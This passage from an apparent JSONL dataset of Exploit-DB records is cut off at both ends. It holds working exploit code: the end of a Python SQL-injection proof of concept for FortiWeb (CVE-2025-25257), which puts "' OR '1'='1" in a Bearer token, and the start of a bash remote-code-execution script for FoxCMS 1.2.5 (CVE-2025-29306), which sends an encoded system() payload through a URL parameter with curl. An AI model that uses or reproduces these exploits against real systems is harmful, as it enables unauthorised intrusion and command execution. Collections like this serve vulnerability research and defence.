\"Authorization\": \"Bearer aaa' OR '1'='1\"\n }\n try:\n response = requests.get(url, headers=headers, verify=False,\ntimeout=10)\n print(f\"Status code: {response.status_code}\")\n print(\"Response body:\")\n print(response.text)\n except Exception as e:\n print(f\"Error: {e}\")\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description=\"PoC SQLi By Ex3ptionaL\nCVE-2025-25257 FortiWeb\")\n parser.add_argument(\"base_url\", help=\"Base URL of FortiWeb (ex:\nhttps://10.0.0.5)\")\n args = parser.parse_args()\n test_sqli(args.base_url)\n# python3 src/poc.py https://10.0.0.5", "cve_id": "CVE-2025-25257", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "d0294f9d90054ebb37ee", "text": "FoxCMS 1.2.5 - Remote Code Execution (RCE)\n\n# Date: 2025-04-17\n# Exploit Title:\n# Exploit Author: VeryLazyTech\n# Vendor Homepage: https://www.foxcms.org/\n# Software Link: https://www.foxcms.cn/\n# Version: FoxCMS v.1.2.5\n# Tested on: Ubuntu 22.04, Windows Server 2019\n# CVE: CVE-2025-29306\n# Website: https://www.verylazytech.com\n\n#!/bin/bash\n\nbanner() {\ncat <<'EOF'\n ______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\| ___| |___ \\ / _ \\___ / / _ \\ / /_\n| | \\ \\ / /| _| __) | | | |__) |___ \\ __) | (_) ||_ \\| | | | '_ \\\n| |___ \\ V / | |___ / __/| |_| / __/ ___) | / __/ \\__, |__) | |_| | (_) |\n \\____| \\_/ |_____| |_____|\\___/_____|____/ |_____| /_/____/ \\___/ \\___/\n\n__ __ _ _____ _\n\\ \\ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__\n \\ \\ / / _ \\ '__| | | | | | / _` |_ / | | | | |/ _ \\/ __| '_ \\\n \\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |\n \\_/ \\___|_| \\__, | |_____\\__,_/___|\\__, | |_|\\___|\\___|_| |_|\n |___/ |___/\n\n\n @VeryLazyTech - Medium\n\nEOF\n\n}\n\n# Call the banner function\nbanner\n\nset -e\n\n# Check for correct number of arguments\nif [ \"$#\" -ne 2 ]; then\n printf \"Usage: $0 \"\n exit 1\nfi\n\nTARGET=$1\n\n# Encode payload\nENCODED_CMD=$(python3 -c \"import urllib.parse; print(urllib.parse.quote('\\${@print_r(@system(\\\"$2\\\"))}'))\")\nFULL_URL=\"${TARGET}?id=${ENCODED_CMD}\"\n\necho \"[*] Sending RCE payload: $2\"\nHTML=$(curl -s \"$FULL_URL\")\n\n# Extract